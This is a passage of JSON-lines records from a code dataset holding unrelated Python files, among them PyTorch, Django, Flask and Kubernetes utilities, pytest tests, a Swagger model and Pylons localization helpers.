open_image(image_name, colors):\n image_name = str(image_name)\n channels = [Image.open(image_name+'_'+color+'.png') for color in colors]\n img = np.stack([np.asanyarray(c) for c in channels], axis=-1)\n img = Image.fromarray(img)\n return img\n\n\nclass ProteinDataset(Dataset):\n def __init__(self, csv_file, images_dir,\n colors=['red', 'green', 'blue'], \n idxs=None, transforms=None):\n csv_content = pd.read_csv(csv_file)\n self._filenames = np.array(csv_content['Id'].tolist())\n self._labels = MultiLabelBinarizer().fit_transform([tuple(int(i) for i in item.split(' ')) \n for item in csv_content['Target'].tolist()])\n assert len(self._filenames) == len(self._labels)\n if idxs is not None:\n self._filenames = self._filenames[idxs]\n self._labels = self._labels[idxs]\n \n self._images_dir = images_dir\n self._colors = colors \n self._transforms = transforms\n \n def __len__(self):\n return len(self._filenames)\n \n def __getitem__(self, idx):\n image = open_image(self._images_dir / self._filenames[idx], \n self._colors)\n if self._transforms is not None:\n image = self._transforms(image)\n \n labels = self._labels[idx]\n \n sample = (image, labels)\n \n return sample","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568720014","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom 
datetime import datetime\nfrom datetime import timedelta\n\n\"\"\"\nAmount of time to look back when restarting\nthe listener. This helps make sure that we don't\nlose any edits when the listener is restarted.\n\"\"\"\nLOOKBEHIND_OFFSET = timedelta(minutes=5)\n\nif __name__ == '__main__':\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"editgroups.settings\")\n import django\n django.setup()\n\n from store.stream import WikiEditStream\n from store.utils import grouper\n from store.models import Edit\n\n print('Listening to edits...')\n s = WikiEditStream()\n utcnow = datetime.utcnow()\n try:\n latest_edit_seen = Edit.objects.order_by('-timestamp')[0].timestamp\n fetch_from = latest_edit_seen - LOOKBEHIND_OFFSET\n except IndexError:\n fetch_from = None\n print('Starting from offset %s' % (fetch_from.isoformat() if fetch_from else 'now'))\n\n for i, batch in enumerate(grouper(s.stream(fetch_from), 50)):\n if i % 50 == 0:\n print('batch %d' % i)\n print(datetime.fromtimestamp(batch[0].get('timestamp')))\n sys.stdout.flush()\n Edit.ingest_edits(batch)\n\n print('End of stream')\n\n","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"281732490","text":"##############################################################################\n# Copyright by The HDF Group. #\n# All rights reserved. #\n# #\n# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #\n# Utilities. The full HSDS copyright notice, including #\n# terms governing use, modification, and redistribution, is contained in #\n# the file COPYING, which can be found at the root of the source code #\n# distribution tree. If you do not have access to this file, you may #\n# request a copy from help@hdfgroup.org. #\n##############################################################################\n#\n# Kubernetes utility functions\n#\n\nfrom kubernetes import client as k8s_client\nfrom kubernetes import config as k8s_config\nimport urllib3\nfrom .. 
import hsds_logger as log\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef getPodIps(k8s_app_label, k8s_namespace=None):\n \"\"\" Return list of IPs of all pods in the cluster with given app label\n (and namespace if set)\n \"\"\"\n\n # get the config from within the cluster and set it as the default config\n # for all new clients\n k8s_config.load_incluster_config()\n c = k8s_client.Configuration() # go and get a copy of the default config\n c.verify_ssl = False # set verify_ssl to false in that config\n # make that config the default for all new clients\n k8s_client.Configuration.set_default(c)\n v1 = k8s_client.CoreV1Api()\n if k8s_namespace:\n # get pods for given namespace\n log.debug(f\"getting pods for namespace: {k8s_namespace}\")\n ret = v1.list_namespaced_pod(namespace=k8s_namespace)\n else:\n log.info(\"getting pods for all namespaces\")\n ret = v1.list_pod_for_all_namespaces(watch=False)\n pod_ips = []\n for i in ret.items:\n pod_ip = i.status.pod_ip\n if not pod_ip:\n continue\n labels = i.metadata.labels\n if labels and \"app\" in labels and labels[\"app\"] == k8s_app_label:\n msg = f\"found hsds pod with app label: {k8s_app_label} \"\n msg += f\"- ip: {pod_ip}\"\n log.debug(msg)\n pod_ips.append(pod_ip)\n\n pod_ips.sort() # for assigning node numbers\n return pod_ips\n","sub_path":"hsds/util/k8sClient.py","file_name":"k8sClient.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"233855453","text":"\nfrom collections import defaultdict\nfrom typing import DefaultDict, Dict\n\n\nclass Averager:\n \"\"\"\n Keeps the loss/metrics values for each iteration.\n Outputs their average.\n \"\"\"\n def __init__(self) -> None:\n self.current_total: DefaultDict[str, float] = defaultdict(float)\n self.iterations = 0\n\n def send(self, dictionary: Dict[str, float]) -> None:\n for key, value in dictionary.items():\n self.current_total[key] += value\n self.iterations += 1\n\n def reset(self) -> None:\n for key in self.current_total.keys():\n self.current_total[key] = 0.0\n self.iterations = 0\n\n def value(self) -> Dict[str, float]:\n if self.iterations == 0:\n return {}\n average_dict = dict()\n for key, value in self.current_total.items():\n average_dict[key] = value / self.iterations\n return average_dict\n","sub_path":"various_image_recognition_models/src/loggers/utils/averager.py","file_name":"averager.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"41519346","text":"# while(1) is an always-true loop; it only exits via break\nwhile(1):\n # \\n is the newline character\n inp=int(input(\"Enter Your Number\\n\"))\n if inp>=100:\n print(\"Congrats, you have entered a number greater than 100\")\n break\n else:\n print(\"Try Again!\\n\")\n continue\n","sub_path":"python_basics/whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"9206438","text":"from rest_framework import serializers\n\nfrom . 
import models\n\n\nclass RiskFieldSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.RiskField\n fields = ('id', 'name', 'type', 'options')\n extra_kwargs = {\n 'options': {'required': False},\n 'id': {\n 'read_only': False,\n 'required': False\n },\n }\n\n\nclass RiskTypeSerializer(serializers.ModelSerializer):\n risk_fields = RiskFieldSerializer(many=True, required=False)\n\n class Meta:\n model = models.RiskType\n fields = ('id', 'name', 'risk_fields', 'table_name')\n read_only_fields = ('id', 'table_name')\n\n def create(self, validated_data):\n risk_fields = validated_data.pop('risk_fields', [])\n risk_type = super(RiskTypeSerializer, self).create(validated_data)\n for field in risk_fields:\n risk_type.risk_fields.create(**field)\n return risk_type\n\n def update(self, instance, validated_data):\n risk_fields = validated_data.pop('risk_fields', [])\n instance = super(RiskTypeSerializer, self).update(\n instance, validated_data)\n for field_data in risk_fields:\n field_id = field_data.pop('id', None)\n if field_id:\n field = instance.risk_fields.get(id=field_id)\n for field_key, field_value in field_data.items():\n setattr(field, field_key, field_value)\n field.save()\n else:\n instance.risk_fields.create(**field_data)\n return instance\n","sub_path":"custom/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"467940986","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import AiClass\n\n# Create your views here.\nstudents=['jisu','suho','minsu']\n\ndef home(request):\n classes=AiClass.objects.all()\n\n context={\n 'classes':classes\n }\n\n return render(request,'home.html',context)","sub_path":"firstproject/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"565307759","text":"from flask import Flask, jsonify, request, g\nfrom flask_cors import CORS\nfrom controllers import people\nfrom werkzeug import exceptions\nimport sqlite3\n\napp = Flask(__name__)\nCORS(app)\n\nDATABASE = \"./database/database.db\"\n\n@app.route('/')\ndef home():\n init_db()\n return jsonify({'message': 'Hello from futureproof DB!'}), 200\n\n@app.route('/people', methods=['GET', 'POST'])\ndef people_handler():\n fns = {\n 'GET': people.index,\n 'POST': people.create\n }\n resp, code = fns[request.method](request)\n return jsonify(resp), code\n\n@app.route('/people/<people_id>', methods=['GET'])\ndef person_handler(people_id):\n fns = {\n 'GET': people.show\n }\n resp, code = fns[request.method](request, people_id)\n return jsonify(resp), code\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n get_db().commit()\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n@app.errorhandler(exceptions.NotFound)\ndef handle_404(err):\n return {'message': f'Could not be found: {err}'}, 
404\n\n@app.errorhandler(exceptions.BadRequest)\ndef handle_400(err):\n return {'message': f'Bad request: {err}'}, 400\n\n@app.errorhandler(exceptions.InternalServerError)\ndef handle_500(err):\n return {'message': f\"Internal Server Error: {err}\"}, 500\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"90551087","text":"from scipy import *\r\nimport matplotlib.pyplot as plt\r\n \r\n## plot the picture in 2D space; x, y describe the space.\r\n## A is a 1D array of complex numbers\r\n## Kvectors is an N*2 matrix, where N equals len(A)\r\n## Psi is a complex 2D array with the same shape as x and y\r\n## the j suffix (e.g. 1j) marks a numeric literal as complex\r\n \r\ndef wave_superposition(x, y, Amplitudes, Kvectors):\r\n assert len(x) == len(y)\r\n # assert len(Amplitudes) == len(Kvectors[:,0])\r\n N=len(Amplitudes)\r\n phi=zeros(x.shape, dtype=complex) # allocate a complex-typed accumulator\r\n for i in range(N):\r\n phi+=Amplitudes[i]*exp(1j*(Kvectors[i,0]*x+Kvectors[i,1]*y)) # array arithmetic applies elementwise\r\n return phi\r\n \r\n \r\nx,y=array([[1.0,2.0],[1.0,3.0]]), array([[2.0,4.0],[2.0,4.0]]) # assign two arrays at once; they must be arrays (not tuples) for elementwise math \r\n \r\nk=array([[1.0,-1.0]]) # double brackets make it a 2D array\r\n \r\nA= array([1.0+0j]) # A is an array holding one complex amplitude\r\n # r could be bundled as a matrix: r = array([x, y])\r\npsi= wave_superposition(x,y,A,k)\r\nprint(psi)\r\n","sub_path":"Dropbox/workspace/pythoncode/PAP723/problem_set0/wavefunction2.py","file_name":"wavefunction2.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"176917715","text":"from backend import get_board, get_coordinates, get_data, get_tile_id, get_tile_rotation\nimport pytest\n\n@pytest.mark.parametrize(\"map_name\", [\"test_1\", \"test_2\", \"test_3\"])\ndef test_get_coordinates_returns_list(map_name):\n \"\"\"Test that get_coordinates() returns a list for each map.\"\"\"\n data = get_data(\"maps/\" + map_name + \".json\")\n coordinates = get_coordinates(data)\n assert isinstance(coordinates, list)\n\n\n# Set of tests checking the structure of the JSON file read (expected to come from Tiled 1.2)\ndef test_map_returns_correct_data_list():\n \"\"\"Take JSON file with test_1 map and assert correct data list.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"layers\"][0][\"data\"] == [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\n\n\n@pytest.mark.parametrize((\"id_number\", \"expected_value\"),\n [(0, 0),\n (2, 2),\n (4, 6),\n (6, 9),\n (13, 16),])\ndef test_map_returns_correct_image_ID(id_number, expected_value):\n \"\"\"Take JSON file with test_1 map and assert correct image ID.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"tilesets\"][0][\"tiles\"][id_number][\"id\"] == 
expected_value\n\n\n@pytest.mark.parametrize((\"id_number\", \"expected_value\"),\n [(0, \"../img/squares/png/ground.png\"),\n (2, \"../img/squares/png/laser_1_base.png\"),\n (4, \"../img/squares/png/gear_r.png\"),\n (6, \"../img/squares/png/pusher_1_3_5.png\"),\n (13, \"../img/squares/png/laser_2.png\"),])\ndef test_map_returns_correct_image_path(id_number, expected_value):\n \"\"\"Take JSON file with test_1 map and assert correct image path.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"tilesets\"][0][\"tiles\"][id_number][\"image\"] == expected_value\n\n\ndef test_get_board_instance():\n \"\"\" Take JSON file with test_3 map and assert correct tilelist is returned.\n\n If the test_3.json map is changed or removed, the test needs to be updated.\"\"\"\n\n data = get_data(\"maps/test_3.json\")\n board = get_board(data)\n assert isinstance(board, dict)\n assert isinstance(board[1], dict)\n\n@pytest.mark.parametrize((\"input_number\", \"converted_number\"),\n [(1, 1),\n (2684354573, 13),\n (2684354584, 24),\n (1610612749, 13)])\ndef test_convert_tile_id(input_number, converted_number):\n assert get_tile_id(input_number) == converted_number\n\n\n@pytest.mark.parametrize((\"input_number\", \"converted_number\"),\n [(1, 0),\n (2684354573, 10),\n (2684354584, 10),\n (1610612749, 6),\n (3221225497, 12)])\ndef test_convert_tile_rotation(input_number, converted_number):\n assert get_tile_rotation(input_number) == converted_number\n","sub_path":"test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327495641","text":"\"\"\"\nCopyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.\nUse of this source code is governed by a BSD-style license that can be found in the LICENSE file.\nAuthors and contributors: Eric Shook (eshook@kent.edu); Zhengliang Feng (odayfans@gmail.com, zfeng2@kent.edu)\n\"\"\"\nfrom .BoundingBox import *\nimport itertools\nimport PCMLConfig\nfrom .PCMLPrims import *\nimport multiprocessing as mp\nclass Subdomain(BoundingBox):\n \"\"\"Subdomain class represents a subdomain (portion) of a layer.\"\"\"\n\n def __init__(self, y, x, h, w, title):\n \"\"\"Create a new subdomain object.\n :class:`Subdomain` objects are generators, iterating over a subdomain object will give you all locations in the subdomain.\n Args:\n :param y (double): The y location (lower left corner typically) of the :class:`BoundingBox`.\n :param x (double): The x location (lower left corner typically) of the :class:`BoundingBox`. \n :param h (double): The height of the :class:`BoundingBox`. \n :param w (double): The width of the :class:`BoundingBox`. \n :param title (str): title(name) of the portion\n \"\"\"\n super(Subdomain, self).__init__(y, x, h, w)\n self.title=title\n\n # Only valid when data_structure==Datastructure.array\n self.r=None\n self.c=None\n #iter count is used to check whether the processing for subdomain is done at scheduler level. 
If it is 0 then the subdomain won't be processed any more\n if PCMLConfig.exectype==ExecutorType.serialpython:\n self.itercount=0\n elif PCMLConfig.exectype==ExecutorType.parallelpythonqueue:\n self.itercount=mp.Value('i',0)\n # getter for itercount (plain int in serial mode, multiprocessing.Value otherwise)\n def get_itercount(self):\n if PCMLConfig.exectype==ExecutorType.serialpython:\n return self.itercount\n else:\n return self.itercount.value\n def set_itercount(self,val):\n if PCMLConfig.exectype==ExecutorType.serialpython:\n self.itercount=val\n else:\n self.itercount.value=val\n\n def __repr__(self):\n return \"<Subdomain y=%s x=%s h=%s w=%s title=%s>\" % (self.y,self.x,self.h,self.w,self.title)\n\n","sub_path":"pcml/core/Subdomain.py","file_name":"Subdomain.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"383434719","text":"def day_totals(month, year):\n\t\"\"\" Clinton daily totals from Schedule A CSV \"\"\"\n\tmonth_str = '\"' + str(month)\n\tyear_str = str(year) + '\"'\n\tdaily_totals = {}\n\tmonthly_sum = 0\n\n\twith open('csv_utils/db/hillary_schedA.csv', 'r') as f:\n\t\tfor line in f.readlines():\n\t\t\t# split lines at the commas\n\t\t\trow_values = line.split(',')\n\t\t\t# get the date, make it an array\n\t\t\tdate = row_values[8].split('/')\n\t\t\t# for every row that is in the desired month and year\n\t\t\tif date[0] == month_str and date[2] == year_str:\n\t\t\t\tday = int(date[1])\n\t\t\t\t# if the day is not yet in the daily totals, add it to the dictionary\n\t\t\t\tif day not in daily_totals.keys():\n\t\t\t\t\tdaily_totals[day] = 0\n\t\t\t\t# get the amount from the row, remove the quotes and dollar sign\n\t\t\t\tamount = float(row_values[9][2:-1])\n\t\t\t\t# add the row amount to the monthly sum\n\t\t\t\tmonthly_sum += amount\n\t\t\t\t# add the row amount to that day's daily total\n\t\t\t\tdaily_totals[day] += amount\n\t\t\telse: \n\t\t\t\tpass # go to next line in csv file\n\t\t\t\t\n\treturn daily_totals, monthly_sum\n\n\ndef monthly_total_per_day(daily_totals):\n\tmonthly_totals = {}\n\tmonth_total = 0\n\tfor day in daily_totals:\n\t\tmonth_total += daily_totals[day]\n\t\tmonthly_totals[day] = month_total\n\treturn monthly_totals\n\n# print('start')\n# daily_totals, month_sum = day_totals(month, year)\n# print('------ Daily Totals ------')\n# for day in daily_totals:\n# \tprint(day, daily_totals[day])\n# print('Month Sum Function 1:', month_sum)\n\n# print('------ Month Sum Function 2 ------')\n# monthly_totals = monthly_total_per_day(daily_totals)\n# for day in monthly_totals:\n# \tprint(day, monthly_totals[day])\n","sub_path":"csv_utils/hillary.py","file_name":"hillary.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"601462126","text":"import logging\n\nimport ocdskingfisherprocess.cli.commands.base\nimport ocdskingfisherprocess.database\n\n\nclass UpdateCollectionCachesCLICommand(ocdskingfisherprocess.cli.commands.base.CLICommand):\n command = 'update-collection-caches'\n\n def run_command(self, args):\n logger = logging.getLogger('ocdskingfisher.cli.update-collection-caches')\n logger.info(\"Starting command\")\n\n for collection in self.database.get_all_collections():\n if collection.store_end_at:\n if not args.quiet:\n print(\"Collection \" + str(collection.database_id))\n logger.info(\"Starting to update caches for collection \" + str(collection.database_id))\n 
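# recompute this collection's cached columns now that its store phase has finished\n 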
self.database.update_collection_cached_columns(collection.database_id)\n","sub_path":"ocdskingfisherprocess/cli/commands/update_collection_caches.py","file_name":"update_collection_caches.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313680867","text":"def sumNumbers(s):\n\tl = len(s)\n\tinteg = []\n\ti = 0\n\twhile i < l:\n\t\ts_int = ''\n\t\ta = s[i]\n\t\twhile '0' <= a <= '9':\n\t\t\ts_int += a\n\t\t\ti += 1\n\t\t\tif i < l:\n\t\t\t\ta = s[i]\n\t\t\telse:\n\t\t\t\tbreak\n\t\ti += 1\n\t\tif s_int != '':\n\t\t\tinteg.append(int(s_int))\n \n\treturn sum(integ)\n\nprint(sumNumbers('123wer24r'))","sub_path":"allProgramms/helpforpyt/sum of numbers.py","file_name":"sum of numbers.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266089687","text":"# coding: utf-8\n\n\"\"\"\n BinckBank.OpenApi\n\n BinckBank OpenAPI is an API Platform to access BinckBank's trading services. Curious? Request your access key after reading the documentation on Github: https://github.com/binckbank-api/client-js#binck-openapi-documentation # noqa: E501\n\n OpenAPI spec version: v1\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass DerivativesInfoModel(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'underlying_instrument_id': 'str',\n 'strike': 'float',\n 'strike_decimals': 'int',\n 'option_type': 'str',\n 'contract_size': 'float',\n 'expiration_date': 'datetime'\n }\n\n attribute_map = {\n 'underlying_instrument_id': 'underlyingInstrumentId',\n 'strike': 'strike',\n 'strike_decimals': 'strikeDecimals',\n 'option_type': 'optionType',\n 'contract_size': 'contractSize',\n 'expiration_date': 'expirationDate'\n }\n\n def __init__(self, underlying_instrument_id=None, strike=None, strike_decimals=None, option_type=None, contract_size=None, expiration_date=None, _configuration=None): # noqa: E501\n \"\"\"DerivativesInfoModel - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._underlying_instrument_id = None\n self._strike = None\n self._strike_decimals = None\n self._option_type = None\n self._contract_size = None\n self._expiration_date = None\n self.discriminator = None\n\n if underlying_instrument_id is not None:\n self.underlying_instrument_id = underlying_instrument_id\n if strike is not None:\n self.strike = strike\n if strike_decimals is not None:\n self.strike_decimals = strike_decimals\n if option_type is not None:\n self.option_type = option_type\n if contract_size is not None:\n self.contract_size = contract_size\n if expiration_date is not None:\n self.expiration_date = expiration_date\n\n @property\n def underlying_instrument_id(self):\n \"\"\"Gets the underlying_instrument_id of this DerivativesInfoModel. # noqa: E501\n\n Instrument Id # noqa: E501\n\n :return: The underlying_instrument_id of this DerivativesInfoModel. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._underlying_instrument_id\n\n @underlying_instrument_id.setter\n def underlying_instrument_id(self, underlying_instrument_id):\n \"\"\"Sets the underlying_instrument_id of this DerivativesInfoModel.\n\n Instrument Id # noqa: E501\n\n :param underlying_instrument_id: The underlying_instrument_id of this DerivativesInfoModel. # noqa: E501\n :type: str\n \"\"\"\n\n self._underlying_instrument_id = underlying_instrument_id\n\n @property\n def strike(self):\n \"\"\"Gets the strike of this DerivativesInfoModel. # noqa: E501\n\n Strike price # noqa: E501\n\n :return: The strike of this DerivativesInfoModel. # noqa: E501\n :rtype: float\n \"\"\"\n return self._strike\n\n @strike.setter\n def strike(self, strike):\n \"\"\"Sets the strike of this DerivativesInfoModel.\n\n Strike price # noqa: E501\n\n :param strike: The strike of this DerivativesInfoModel. # noqa: E501\n :type: float\n \"\"\"\n\n self._strike = strike\n\n @property\n def strike_decimals(self):\n \"\"\"Gets the strike_decimals of this DerivativesInfoModel. # noqa: E501\n\n Maximum number of decimals in strike price # noqa: E501\n\n :return: The strike_decimals of this DerivativesInfoModel. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strike_decimals\n\n @strike_decimals.setter\n def strike_decimals(self, strike_decimals):\n \"\"\"Sets the strike_decimals of this DerivativesInfoModel.\n\n Maximum number of decimals in strike price # noqa: E501\n\n :param strike_decimals: The strike_decimals of this DerivativesInfoModel. # noqa: E501\n :type: int\n \"\"\"\n\n self._strike_decimals = strike_decimals\n\n @property\n def option_type(self):\n \"\"\"Gets the option_type of this DerivativesInfoModel. # noqa: E501\n\n Option type (put or call) # noqa: E501\n\n :return: The option_type of this DerivativesInfoModel. # noqa: E501\n :rtype: str\n \"\"\"\n return self._option_type\n\n @option_type.setter\n def option_type(self, option_type):\n \"\"\"Sets the option_type of this DerivativesInfoModel.\n\n Option type (put or call) # noqa: E501\n\n :param option_type: The option_type of this DerivativesInfoModel. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"put\", \"call\"] # noqa: E501\n if (self._configuration.client_side_validation and\n option_type not in allowed_values):\n raise ValueError(\n \"Invalid value for `option_type` ({0}), must be one of {1}\" # noqa: E501\n .format(option_type, allowed_values)\n )\n\n self._option_type = option_type\n\n @property\n def contract_size(self):\n \"\"\"Gets the contract_size of this DerivativesInfoModel. # noqa: E501\n\n Contract size # noqa: E501\n\n :return: The contract_size of this DerivativesInfoModel. # noqa: E501\n :rtype: float\n \"\"\"\n return self._contract_size\n\n @contract_size.setter\n def contract_size(self, contract_size):\n \"\"\"Sets the contract_size of this DerivativesInfoModel.\n\n Contract size # noqa: E501\n\n :param contract_size: The contract_size of this DerivativesInfoModel. # noqa: E501\n :type: float\n \"\"\"\n\n self._contract_size = contract_size\n\n @property\n def expiration_date(self):\n \"\"\"Gets the expiration_date of this DerivativesInfoModel. # noqa: E501\n\n Expiration date # noqa: E501\n\n :return: The expiration_date of this DerivativesInfoModel. 
# noqa: E501\n :rtype: datetime\n \"\"\"\n return self._expiration_date\n\n @expiration_date.setter\n def expiration_date(self, expiration_date):\n \"\"\"Sets the expiration_date of this DerivativesInfoModel.\n\n Expiration date # noqa: E501\n\n :param expiration_date: The expiration_date of this DerivativesInfoModel. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._expiration_date = expiration_date\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(DerivativesInfoModel, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DerivativesInfoModel):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DerivativesInfoModel):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"swagger_client/models/derivatives_info_model.py","file_name":"derivatives_info_model.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195812702","text":"# runtime: 85.28%, memory usage: 43.17%\ndef toHex(num: int) -> str:\n result = \"\"\n\n for _ in range(8):\n digit = num & 0b1111\n result = \"0123456789abcdef\"[digit] + result\n num >>= 4\n\n if num == 0:\n break\n\n return result\n\n\nif __name__ == '__main__':\n result = toHex(26)\n print(result) # \"1a\"","sub_path":"lc_solutions/bit_manipulation/convert_a_number_to_hexadecimal-405/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"531937836","text":"#-*- coding: utf-8 -*-\n\"\"\"Helper functions\n\nConsists of functions to typically be used within templates, but also\navailable to Controllers. 
This module is available to templates as 'h'.\n\"\"\"\n# Import helpers as desired, or define your own, ie:\n#from webhelpers.html.tags import checkbox, password\nfrom pylons import session, request, response, url\nfrom pylons.i18n import get_lang, set_lang\nfrom pylons.i18n.translation import _, ungettext\nfrom decorator import decorator\nimport json\n\ndef styleProjectName(name):\n plase_ad = name.lower().find('ad',len(name)-2,len(name))\n if plase_ad > 0 :\n result = '' +\\\n name[0:plase_ad] +\\\n 'ad'\n else:\n result = name\n return result\n\n@decorator\ndef localize(f, *args, **kwargs):\n if 'lang' in session:\n lang = session['lang']\n set_lang(lang)\n else:\n suport_lang = ['ru','en','uk']\n suport_domain = ['cleverad.yt:5000','10.0.0.8:5000']\n default_lang = 'ru'\n lang_cookie = request.cookies.get('lang', None)\n if not lang_cookie in suport_lang:\n lang_cookie = None\n domain = request.environ.get('HTTP_HOST', None)\n if not domain in suport_domain:\n domain = None\n if lang_cookie != None:\n lang = lang_cookie\n else:\n if domain == 'cleverad.yt:5000':\n lang = 'en'\n elif domain == '10.0.0.8:5000':\n lang = 'uk'\n elif domain == '10.0.0.8':\n lang = 'ru'\n else:\n lang = default_lang\n session['lang'] = lang\n session.save()\n set_lang(lang)\n response.set_cookie('lang', lang, max_age=360*24*3600 )\n return f(*args, **kwargs)\ndef rulesLink(link):\n rulesLink= []\n curentRulesTitle = _(u'Текущая версия')\n oldRulesTitle = _(u'Предыдущая версия')\n rulesLink.append(\"
